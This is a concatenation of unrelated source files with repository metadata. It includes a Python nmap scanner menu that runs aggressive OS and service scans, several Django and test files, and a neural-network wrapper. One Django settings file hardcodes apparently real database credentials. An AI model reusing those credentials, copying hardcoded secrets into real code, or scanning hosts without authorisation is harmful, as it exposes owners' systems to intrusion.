for proto in scanner[host].all_protocols():
print('----------')
print('Protocol : %s' % proto)
lport = scanner[host][proto].keys()
for port in lport:
print ('port: %s\tstate: %s\tname: %s' % (port, scanner[host][proto][port]['state'], scanner[host][proto][port]['name']))
pdfData = scanner.csv()
time.sleep(2)
elif userResponse == '3':
print("Nmap version: ",nmapVer[0],".",nmapVer[1])
scanner.scan(ipAddr, tgtPorts, '-v -PE')
# print(scanner.scaninfo())
# print(scanner.csv())
# print("IP Status: ", scanner[ipAddr].state())
# print(scanner[ipAddr].all_protocols())
# print("Open ports: ", scanner[ipAddr]['tcp'].keys())
for host in scanner.all_hosts():
print('----------------------------------------------------')
print('Host : %s (%s)' % (host, scanner[host].hostname()))
print('State : %s' % scanner[host].state())
for proto in scanner[host].all_protocols():
print('----------')
print('Protocol : %s' % proto)
lport = scanner[host][proto].keys()
for port in lport:
print ('port: %s\tstate: %s\tname: %s' % (port, scanner[host][proto][port]['state'], scanner[host][proto][port]['name']))
pdfData = scanner.csv()
time.sleep(2)
elif userResponse == '5':
print("Nmap version: ",nmapVer[0],".",nmapVer[1])
scanner.scan(ipAddr, tgtPorts, '-v -sS -sV -sC -A -O')
# print(scanner.scaninfo())
# print("IP Status: ", scanner[ipAddr].state())
# print(scanner[ipAddr].all_protocols())
# print("Open ports: ", scanner[ipAddr]['tcp'].keys())
for host in scanner.all_hosts():
print('----------------------------------------------------')
print('Host : %s (%s)' % (host, scanner[host].hostname()))
print('State : %s' % scanner[host].state())
for proto in scanner[host].all_protocols():
print('----------')
print('Protocol : %s' % proto)
lport = scanner[host][proto].keys()
for port in lport:
print ('port: %s\tstate: %s\tname: %s' % (port, scanner[host][proto][port]['state'], scanner[host][proto][port]['name']))
pdfData = scanner.csv()
time.sleep(2)
elif userResponse >= '6':
print("Please enter a valid option")
time.sleep(2)
print("<--------------------------------------------------------->")
print("Your scan is complete!")
pdfInput = input("\nDo you want to store the csv of your results in a python-generated pdf? It's prettty coool....""""
1) Yes, I am awesome and I want to do that!
2) No, I don't want to do that cool thing. \n\n Choose from the above options and press enter: """)
#loop through data and generate pdf
if pdfInput == '1':
for i in pdfData:
pdf.write(5,str(i))
pdf.output("scanResults.pdf")
elif pdfInput == '2':
print("You missed out man...I'm sorry") | [
"noreply@github.com"
] | noreply@github.com |
c23ddb3931f40fcabc701c9e3b5cb986269f8faa | 95e057a729db6480e6769d5aa0bfa0775fa35b9f | /run.py | ced8e2b08a1271848924c9a7dc7e4762b260a688 | [
"BSD-2-Clause"
] | permissive | jinbow/swotsimulator | 755594716a5c5f8619f22f1bd2640dc08500aa80 | 20a3330ee8b0c64ccd26818163fb9adc75b1e37e | refs/heads/master | 2020-12-25T02:40:20.763294 | 2016-06-22T14:53:31 | 2016-06-22T14:53:31 | 62,241,313 | 0 | 1 | null | 2016-06-29T16:30:59 | 2016-06-29T16:30:59 | null | UTF-8 | Python | false | false | 563 | py | import sys, os
import shutil
if (len(sys.argv) < 2):
file_param=os.getcwd()+os.sep+'example'+os.sep+'params_example.txt'
print("no params file specified, default is " +file_param)
else:
file_param=str(sys.argv[1])
if os.path.isfile(file_param):
# basedir=os.path.dirname(swotsimulator.__file__)
shutil.copyfile(file_param, 'params.py') #os.path.join(basedir,'params.py'))
else:
print("Error: No such file: '%s'" % file_param)
sys.exit()
import swotsimulator.run_simulator as run_simulator
run_simulator.run_simulator(file_param)
| [
"Jinbo.Wang@jpl.nasa.gov"
] | Jinbo.Wang@jpl.nasa.gov |
1fa3f2cd18faf6841eb0271edd0c907f0dd886a9 | 11015fa254cf01b7f1958885f09e978d14ed2b6f | /pages/tests/documents/urls.py | 993b8117a8dc5617b2478c5f9836b44e31ee431c | [
"BSD-3-Clause"
] | permissive | af/django-page-cms | f68ac0f818a8a7040e5f02fc6c3211e44ad6e77a | 0f1ac577e8d2cc86f14ea08c24128220f1a6b534 | refs/heads/master | 2021-01-16T01:02:42.940361 | 2010-03-16T12:13:52 | 2010-03-16T12:13:52 | 565,590 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | from django.conf.urls.defaults import *
from django.conf import settings
from pages.tests.documents.views import document_view
from pages.http import pages_view
urlpatterns = patterns('',
url(r'(?P<document_id>[0-9]+)$', pages_view(document_view), name='document_details'),
url(r'$', pages_view(document_view), name='document_root'),
) | [
"batisteb@opera.com"
] | batisteb@opera.com |
07be2c5f5083ce7d52cb8a81a163a27b1d3f0f02 | fed53a83f014dedd79258ea16c2ec0ffffb522a6 | /src/restfw/tests/test_add_sub_resource_fabric.py | 7c1cb27ebc106b175a04a152e7e5f90f9b8031c2 | [
"MIT"
] | permissive | Cykooz/restfw | a995813c9d4bbd20aa3079ab8192c3d2ba2410d0 | 91951f5e095eaac4ec66ae1d7fe95cc5f6e773d5 | refs/heads/master | 2023-01-23T11:30:11.769448 | 2023-01-10T07:32:15 | 2023-01-10T07:32:15 | 114,084,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,879 | py | # -*- coding: utf-8 -*-
"""
:Authors: cykooz
:Date: 23.11.2018
"""
import pytest
from cykooz.testing import D
from pyramid.traversal import find_interface
from ..hal import HalResource, SimpleContainer
from ..views import HalResourceWithEmbeddedView, list_to_embedded_resources, resource_view_config
class DummyApiVersion(SimpleContainer):
pass
class DummyMinApiVersion:
"""Testing predicate for sub resource fabric"""
def __init__(self, val, config):
self.val = val
def text(self):
return 'min_api_version = %s' % (self.val,)
phash = text
def __call__(self, parent):
api_version = find_interface(parent, DummyApiVersion)
if not api_version:
return False
version = int(api_version.__name__)
return version >= self.val
class DummyMaxApiVersion:
"""Testing predicate for sub resource fabric"""
def __init__(self, val, config):
self.val = val
def text(self):
return 'max_api_version = %s' % (self.val,)
phash = text
def __call__(self, parent):
api_version = find_interface(parent, DummyApiVersion)
if not api_version:
return False
version = int(api_version.__name__)
return version <= self.val
class DummyResource(HalResource):
pass
class SubDummyResource(HalResource):
def __init__(self, parent):
pass
class Sub1DummyResource(HalResource):
def __init__(self, parent):
pass
class Sub2DummyResource(HalResource):
def __init__(self, parent):
pass
class Sub23DummyResource(HalResource):
def __init__(self, parent):
pass
class Container(SimpleContainer):
pass
@resource_view_config(Container)
class ContainerView(HalResourceWithEmbeddedView):
def get_embedded(self, params: dict):
return list_to_embedded_resources(
self.request, params,
resources=list(self.resource.values()),
parent=self.resource,
embedded_name='items'
)
@pytest.fixture(name='root')
def root_fixture(app_config, pyramid_request):
root = pyramid_request.root
root['container'] = Container()
root['container']['resource'] = DummyResource()
for i in range(4):
root[str(i)] = DummyApiVersion()
root[str(i)]['resource'] = DummyResource()
app_config.add_sub_resource_fabric_predicate('min_api_version', DummyMinApiVersion)
app_config.add_sub_resource_fabric_predicate('max_api_version', DummyMaxApiVersion)
app_config.add_sub_resource_fabric(SubDummyResource, 'sub', DummyResource)
app_config.add_sub_resource_fabric(
SubDummyResource, 'static_sub', DummyResource,
add_link_into_embedded=True
)
app_config.add_sub_resource_fabric(
Sub1DummyResource, 'sub1', DummyResource, min_api_version=1
)
app_config.add_sub_resource_fabric(
Sub2DummyResource, 'sub2', DummyResource, max_api_version=2
)
app_config.add_sub_resource_fabric(
Sub23DummyResource, 'sub23', DummyResource,
add_link_into_embedded=True,
min_api_version=2, max_api_version=3,
)
app_config.scan('restfw.tests.test_add_sub_resource_fabric')
app_config.commit()
return root
def test_add_sub_resource_fabric_directive(root):
sub = root['container']['resource']['sub']
assert isinstance(sub, SubDummyResource)
assert sub.__parent__ is root['container']['resource']
assert sub.__name__ == 'sub'
with pytest.raises(KeyError):
_ = root['0']['resource']['sub1']
for v in [1, 2, 3]:
sub1 = root[str(v)]['resource']['sub1']
assert isinstance(sub1, Sub1DummyResource)
with pytest.raises(KeyError):
_ = root['3']['resource']['sub2']
for v in [0, 1, 2]:
sub2 = root[str(v)]['resource']['sub2']
assert isinstance(sub2, Sub2DummyResource)
for v in [0, 1]:
with pytest.raises(KeyError):
_ = root[str(v)]['resource']['sub23']
for v in [2, 3]:
sub23 = root[str(v)]['resource']['sub23']
assert isinstance(sub23, Sub23DummyResource)
def test_links_to_sub_resource(web_app, root, app_config):
# Get self resource
res = web_app.get('container/resource')
assert res.json_body == {
'_links': {
'self': {'href': 'http://localhost/container/resource/'},
'sub': {'href': 'http://localhost/container/resource/sub/'},
'static_sub': {'href': 'http://localhost/container/resource/static_sub/'},
}
}
# Get resource as embedded
res = web_app.get('container')
assert res.json_body == D({
'_embedded': {
'items': [
{
'_links': {
'self': {'href': 'http://localhost/container/resource/'},
# Only static link to sub-resource has added
'static_sub': {'href': 'http://localhost/container/resource/static_sub/'},
},
}
]
}
})
# Get different api versions
res = web_app.get('0/resource')
assert res.json_body == {
'_links': {
'self': {'href': 'http://localhost/0/resource/'},
'sub': {'href': 'http://localhost/0/resource/sub/'},
'sub2': {'href': 'http://localhost/0/resource/sub2/'},
'static_sub': {'href': 'http://localhost/0/resource/static_sub/'},
}
}
res = web_app.get('1/resource')
assert res.json_body == {
'_links': {
'self': {'href': 'http://localhost/1/resource/'},
'sub': {'href': 'http://localhost/1/resource/sub/'},
'sub1': {'href': 'http://localhost/1/resource/sub1/'},
'sub2': {'href': 'http://localhost/1/resource/sub2/'},
'static_sub': {'href': 'http://localhost/1/resource/static_sub/'},
}
}
res = web_app.get('2/resource')
assert res.json_body == {
'_links': {
'self': {'href': 'http://localhost/2/resource/'},
'sub': {'href': 'http://localhost/2/resource/sub/'},
'sub1': {'href': 'http://localhost/2/resource/sub1/'},
'sub2': {'href': 'http://localhost/2/resource/sub2/'},
'sub23': {'href': 'http://localhost/2/resource/sub23/'},
'static_sub': {'href': 'http://localhost/2/resource/static_sub/'},
}
}
res = web_app.get('3/resource')
assert res.json_body == {
'_links': {
'self': {'href': 'http://localhost/3/resource/'},
'sub': {'href': 'http://localhost/3/resource/sub/'},
'sub1': {'href': 'http://localhost/3/resource/sub1/'},
'sub23': {'href': 'http://localhost/3/resource/sub23/'},
'static_sub': {'href': 'http://localhost/3/resource/static_sub/'},
}
}
| [
"cykooz@gmail.com"
] | cykooz@gmail.com |
c490e3371dd1c651b02fc45c853857c8af37dff3 | b8bd1ad15a48ad88b1b7c2bff870bf5dc1441b66 | /train/network/QNetWrapper.py | 3060adb16b18a36d9f0cfe0fb2da5542389b35b8 | [] | no_license | Jung-JongHyuk/othelloAI | a718f7a6a9cb92b4a26db16e0ec8aec36c6f88c3 | 8918f4cdb9a3bf5efc9887200a12f4d3e3c4d9ab | refs/heads/master | 2023-07-28T14:15:48.633038 | 2021-09-20T07:38:39 | 2021-09-20T07:38:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,315 | py | import torch
import torch.optim as optim
import numpy as np
import time
import sys
import os
from tqdm import tqdm
from .NeuralNet import NeuralNet
from .QVGGNet import QVGGNet
from .QFCNNet import QFCNNet
from .quantizedLayer import Linear_Q, Conv2d_Q
sys.path.append('../')
from train.utils import *
args = dotdict({
'lr': 0.001,
'dropout': 0.3,
'epochs': 10,
'batch_size': 64,
'cuda': torch.cuda.is_available(),
'num_channels': 512,
})
class QNetWrapper(NeuralNet):
def __init__(self, game):
self.nnet = QFCNNet(game, args)
self.boardSize = game.getBoardSize()
self.actionSize = game.getActionSize()
if args.cuda:
self.nnet.cuda()
def train(self, examples):
"""
examples: list of examples, each example is of form (board, pi, v)
"""
optimizer = optim.Adam(self.nnet.parameters())
for epoch in range(args.epochs):
print('EPOCH ::: ' + str(epoch + 1))
self.nnet.train()
pi_losses = AverageMeter()
v_losses = AverageMeter()
batch_count = int(len(examples) / args.batch_size)
t = tqdm(range(batch_count), desc='Training Net')
for _ in t:
sample_ids = np.random.randint(len(examples), size=args.batch_size)
boards, pis, vs = list(zip(*[examples[i] for i in sample_ids]))
boards = torch.FloatTensor(np.array(boards).astype(np.float64))
target_pis = torch.FloatTensor(np.array(pis))
target_vs = torch.FloatTensor(np.array(vs).astype(np.float64))
# predict
if args.cuda:
boards, target_pis, target_vs = boards.contiguous().cuda(), target_pis.contiguous().cuda(), target_vs.contiguous().cuda()
# compute output
out_pi, out_v = self.nnet(boards)
l_pi = self.loss_pi(target_pis, out_pi)
l_v = self.loss_v(target_vs, out_v)
total_loss = l_pi + l_v
# record loss
pi_losses.update(l_pi.item(), boards.size(0))
v_losses.update(l_v.item(), boards.size(0))
t.set_postfix(Loss_pi=pi_losses, Loss_v=v_losses)
# compute gradient and do SGD step
optimizer.zero_grad()
total_loss.backward()
optimizer.step()
for m in self.nnet.modules():
if isinstance(m, Linear_Q) or isinstance(m, Conv2d_Q):
m.clipping()
def predict(self, board):
"""
board: np array with board
"""
# preparing input
board = torch.FloatTensor(board.astype(np.float64))
if args.cuda: board = board.contiguous().cuda()
board = board.view(1, board.shape[0], board.shape[1])
self.nnet.eval()
with torch.no_grad():
pi, v = self.nnet(board)
# print('PREDICTION TIME TAKEN : {0:03f}'.format(time.time()-start))
return torch.exp(pi).data.cpu().numpy()[0], v.data.cpu().numpy()[0]
def loss_pi(self, targets, outputs):
return -torch.sum(targets * outputs) / targets.size()[0]
def loss_v(self, targets, outputs):
return torch.sum((targets - outputs.view(-1)) ** 2) / targets.size()[0]
def save_checkpoint(self, folder='checkpoint', filename='checkpoint.pth.tar'):
filepath = os.path.join(folder, filename)
if not os.path.exists(folder):
print("Checkpoint Directory does not exist! Making directory {}".format(folder))
os.mkdir(folder)
else:
print("Checkpoint Directory exists! ")
torch.save({
'state_dict': self.nnet.state_dict(),
}, filepath)
def load_checkpoint(self, folder='checkpoint', filename='checkpoint.pth.tar'):
# https://github.com/pytorch/examples/blob/master/imagenet/main.py#L98
filepath = os.path.join(folder, filename)
if not os.path.exists(filepath):
raise ("No model in path {}".format(filepath))
map_location = None if args.cuda else 'cpu'
checkpoint = torch.load(filepath, map_location=map_location)
self.nnet.load_state_dict(checkpoint['state_dict']) | [
"system97.solar@gmail.com"
] | system97.solar@gmail.com |
040c7763b82c832690147723dcb4b6f6e0d1c040 | d3c1bdc53ac82f95af085b3890b63a18fd540e38 | /source/elements/oneDAL/dalapi/generator.py | 6a40026e08ef151f9bae309647aad821e401ce72 | [
"MIT",
"CC-BY-4.0"
] | permissive | aregm/oneAPI-spec | be6f30160cc61c4ca21b100ea70578eecf53e6d3 | 20f1275eef1f43271b917c9ac28173957992efab | refs/heads/master | 2022-11-06T10:12:21.589511 | 2020-06-17T05:47:37 | 2020-06-17T05:47:37 | 274,459,461 | 0 | 0 | NOASSERTION | 2020-06-23T16:46:21 | 2020-06-23T16:46:21 | null | UTF-8 | Python | false | false | 2,376 | py | from typing import (List, Text)
from docutils.statemachine import ViewList
class RstBuilder(object):
def __init__(self, placeholder: ViewList, filename: Text, lineno: int):
self._rst_list = placeholder
self._filename = filename
self._lineno = lineno
def add_class(self, kind: str, declaration: str, namespace: str = None, level=0):
self._add_name(kind, declaration, namespace, level)
def add_typedef(self, declaration: str, namespace: str = None, level=0):
self._add_name('type', declaration, namespace, level)
def add_function(self, declaration: str, namespace: str = None, level=0):
self._add_name('function', declaration, namespace, level)
def add_param(self, tag: str, name: str, doc_text: str, level=0):
assert tag in ['param', 'tparam']
assert name
assert doc_text
formatted = self._format_text(doc_text)
self(f':{tag} {name}: {formatted}', level)
def add_member(self, declaration: str, level=0):
assert declaration
self(f'.. cpp:member:: {declaration}', level)
self.add_blank_like()
def add_doc(self, doc_text: str, level=0):
assert doc_text
self(self._format_text(doc_text), level)
self.add_blank_like()
def add_code_block(self, listing: List[Text], level=0):
assert listing is not None
self(f'.. code-block:: cpp', level)
self.add_blank_like()
for line in listing:
self(line, level + 1)
self.add_blank_like()
def add_blank_like(self):
self.add()
def add(self, string: str = '', level: int = 0):
self._rst_list.append(' ' * level * 3 + string, self._filename, self._lineno)
# TODO: Remove
def __call__(self, string: str = '', level:int = 0):
self._rst_list.append(' ' * level * 3 + string, self._filename, self._lineno)
def _add_name(self, tag: str, declaration: str, namespace: str = None, level=0):
assert declaration
if namespace:
self(f'.. cpp:namespace:: {namespace}', level)
self.add_blank_like()
self(f'.. cpp:{tag}:: {declaration}', level)
self.add_blank_like()
def _format_text(self, text):
text = text.strip()
if not (text.endswith('.') or text.endswith('|')):
text += '.'
return text
| [
"noreply@github.com"
] | noreply@github.com |
c97f23f45979a8283906bf4d5620a0ee5ddcdaea | 9a17e586d52a5be6f0c5843b04b7a51fe2be3b03 | /Kheya/settings.py | 8ad4cc150cd337bb096b4997cb77d30727609dff | [] | no_license | ARYASTARK-13/KHEYAforCovid | 6a0ffd9461411da8ff7199cc4e1bde70f5e18470 | 6f33ea7fd53aa2373444a7b3e1c6b2beeebcb9e4 | refs/heads/main | 2023-07-31T16:50:38.235520 | 2021-09-15T07:42:04 | 2021-09-15T07:42:04 | 406,656,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,744 | py | """
Django settings for Kheya project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = SECRET_KEY
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ["kheya.herokuapp.com", "localhost"]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Home',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Kheya.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Kheya.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'd3il4l6hnv042o',
'HOST': 'ec2-54-163-254-204.compute-1.amazonaws.com',
'PORT': 5432,
'USER': 'xndspipcvyqttz',
'PASSWORD': '65b128d98f699baf258c5cb8395693626a6828b43c70b797cf1d92030ab54f73',
}
}
# postgres: // xndspipcvyqttz: 65b128d98f699baf258c5cb8395693626a6828b43c70b797cf1d92030ab54f73@ec2-54-163-254-204.compute-1.amazonaws.com: 5432/d3il4l6hnv042o
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR / 'static'
STATICFILES_DIRS = [
BASE_DIR / "Home" / "static",
]
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"anirbanbiswas19999@gmail.com"
] | anirbanbiswas19999@gmail.com |
c892ca6475cd980d3c84c3c096bf2bd4ea6231d0 | f04d39dd682be3e1c6c2553a86b6fa440f973192 | /informer_vcard/urls.py | 18081a6711381b83de3c0f9a5300051d086d907b | [] | no_license | Wladislav/informer | 440ec52e206758ffa0f8d7dc5660eef32b9214a2 | 0741b72307225bc95a611db4e4ecb2ac679f994d | refs/heads/master | 2021-01-12T00:49:29.001674 | 2017-06-12T13:13:19 | 2017-06-12T13:13:19 | 78,301,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,441 | py | from django.conf.urls import include, url
from . import views
urlpatterns = [
url(r'^vcards/$', views.vcard_list, name='vcard_index'),
url(r'^vcards/vcard_list.json/$', views.vcard_list, name='vcard_index'),
url(r'^vcards/add/$', views.vcard_change, name='vcard_add'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_adress.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_phones.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_emails.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_social.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_messeng.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_hobby.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_interest.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_expertise.json$', views.vcard_change, name='vcard_change'),
] | [
"photocritic72@gmail.com"
] | photocritic72@gmail.com |
edbe5ce081920cf505f9f1ee7665c0fd7b1d8f57 | 9f2a9434453857f259a9cd3087b5bf3cb85c198a | /start.py | 4afd203d1d2e581953d4a84d25cea2fa631df33d | [] | no_license | duke-thurinus/Spoopy-Game-Jam | 6cb4cd3cb7aceccd74ea44493de58dcc097ef989 | 2ce2a0fdb7a4c4b9e394cd9b761dca6dfe5ebaf2 | refs/heads/master | 2021-07-23T00:13:26.480694 | 2017-11-02T16:03:45 | 2017-11-02T16:03:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,546 | py | from random import randint
def initilize():
#navigation between systems
galaxy = { "sol" : ["eta helion", "agromega", "pi abbidon"]
,"eta helion" : ["agromega", "sol"]
,"agromega" : ["eta helion", "euridian", "sol"]
,"pi abbidon" : ["sol", "devolin"]
,"devolin" : ["pi abbidon", "euridian", "ross"]
,"euridian" : ["agromega", "acrux", "carina", "devolin"]
,"acrux" : ["euridian"]
,"carina" : ["euridian", "ross"]
,"ross" : ["devolin", "carina"]
}
#navigation within systems
systems = { "sol" : [ "mercury", "venus", "earth", "mars"
, "the asteroid belt", "jupiter", "saturn"
, "uranus", "neptune" ]
, "eta helion" : [ "eta helion 1", "eta helion 2"
, "eta helion3" ]
, "agromega" : [ "the asteroid belt", "agromega 1" ]
, "pi abbidon" : [ "pi abbidon 1", "pi abbidon 2", "pi abbidon3"
, "pi abbidon 4", "pi abbidon 5" ]
, "devolin" : [None]
, "euridian" : [ "euridian 1", "euridian 2", "euridian 3"
, "euridian 4", "euridian 4", "euridian 5"
, "euridian 6", "euridian 7" ]
, "acrux" : [ "acrux 1", "acrux 2" ]
, "carina" : [ "carina 1" ]
, "ross" : [ "ross 1", "ross 2", "ross 3", "ross 4" ]
}
#ship types
ships = { "my ship" : {"shields" : 100, "structure" : 100
, "engines" : 100, "weapons" : 40
, "sensors" : 100}
, "fighter" : {"shields" : 20, "structure" : 50
, "engines" : 120, "weapons" : 15
, "sensors" : 100}
, "corvette" : {"shields" : 50, "structure" : 75
, "engines" : 120, "weapons" : 20
, "sensors" : 100}
}
#location of enemys
ship_locs = dict()
ship_types = [ "fighter", "corvette" ]
for system in systems:
for planet in systems[system]:
ship_locs[planet] = ship_types[randint( 0, len(ship_types) - 1 )]
gamestate = { "galaxy" : galaxy , "systems" : systems, "ships" : ships
, "ship_locs" : ship_locs ,"location" : [ "sol", "" ]
}
return gamestate
| [
"henry.balch1@marist.edu"
] | henry.balch1@marist.edu |
fde24b5da2b2023a46881ed67ec027af679a60ca | 30173549f50d117d1e4341032b16109ded9b91cb | /mdb_app/urls.py | eb555bc2c46f3b416d588119a4a711ed7b09fdae | [] | no_license | shubham001shubham/shubham_rest_api_moive | 01c17190fdc41733027959703acfbd524bd6be59 | 4cce31a103f53e9dc8425711779ba209c712d659 | refs/heads/master | 2020-05-22T18:31:56.095150 | 2019-05-13T18:21:12 | 2019-05-13T18:21:12 | 186,473,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | from django.urls import path
from .views import ( MovieCreate, MovieList,
UserCreate, LoginView,ChoiceListMovie, Temp , SnippetDetail)
urlpatterns = [
path('api/movie_create/', MovieCreate.as_view(),name='movie_create'),
path('api/list/',MovieList.as_view(),name='movie_list'),
path('api/users/',UserCreate.as_view(),name='users'),
path('api/login/',LoginView.as_view(),name='login'),
path('api/movies/<int:pk>/choices/',ChoiceListMovie.as_view(),name='choice_list'),
#path('api/del/<int:pk>', snippet_detail),
path('api/serach/',Temp.as_view()),
path('api/del/<int:pk>/', SnippetDetail.as_view()),
]
| [
"pragtism@gmail.com"
] | pragtism@gmail.com |
02f22fe5f02b8df2182114217e0c398ecfda644f | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_buyout.py | 5ef4f182702e4982179b22670203e03692b7d3ff | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py |
#calss header
class _BUYOUT():
def __init__(self,):
self.name = "BUYOUT"
self.definitions = [u'(in business) a situation in which a person or group buys all the shares belonging to a company and so gets control of it: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
6f70c7b6c6841e708ef6c51dfadab270faf0d971 | aa20bb8383b81c7c644223f058a8438c006cad01 | /tests/utils.py | cedce72e6e5e7cf8f5955984e29b347ace7bcb22 | [
"MIT"
] | permissive | espenfl/parsevasp | 309f221114be8d330ee8596fa13e4bd7506f6550 | 5f7ced76172fee30a51ca4f08c36beefc72b0a61 | refs/heads/master | 2023-07-09T12:32:34.579858 | 2023-06-05T13:13:47 | 2023-06-05T13:13:47 | 219,450,686 | 0 | 0 | MIT | 2019-11-04T08:19:44 | 2019-11-04T08:19:44 | null | UTF-8 | Python | false | false | 116 | py | def isclose(a, b, rel_tol=1e-07, abs_tol=0.0):
return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
| [
"espen.flage-larsen@sintef.no"
] | espen.flage-larsen@sintef.no |
7909a2ccc6b0bc5bc30e9ba5b59516477b25dac6 | e3be8552aff4dbcf71e5aa165f254fd094bc048c | /examples/adspygoogle/dfp/v201311/contact_service/update_contacts.py | 3495d6abe75be43d79443f2d6930be8b07a16254 | [
"Apache-2.0"
] | permissive | caioserra/apiAdwords | cd1317f05e26edf5cad2faff40c43df96405e715 | 2419b22b1fb7a03cf98355b5793f816319e1e654 | refs/heads/master | 2020-05-05T03:37:16.605798 | 2014-02-03T17:09:39 | 2014-02-03T17:09:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,104 | py | #!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example updates contact addresses.
To determine which contacts exist, run get_all_contacts.py.
Tags: ContactService.getContact
Tags: ContactService.updateContacts
"""
__author__ = 'Vincent Tsao'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
# Set the ID of the contact to get.
CONTACT_ID = 'INSERT_CONTACT_ID_HERE'
def main(client, contact_id):
# Initialize appropriate service.
contact_service = client.GetService('ContactService', version='v201311')
# Get contact.
contact = contact_service.GetContact(contact_id)[0]
if contact:
contact['address'] = '123 New Street, New York, NY, 10011'
# Update the contact on the server.
contacts = contact_service.UpdateContacts([contact])
# Display results.
if contacts:
for contact in contacts:
print (('Contact with ID \'%s\', name \'%s\', and address \'%s\' '
'was updated.')
